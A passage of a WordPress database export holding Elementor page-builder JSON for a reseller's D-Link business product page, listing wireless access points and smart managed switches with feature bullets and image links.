+ Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7522,3403,'_elementor_version','2.5.14'),(7523,3403,'_elementor_edit_mode','builder'),(7526,3404,'_wp_page_template','template-fullwidth.php'),(7527,3404,'_elementor_template_type','post'),(7528,3404,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port 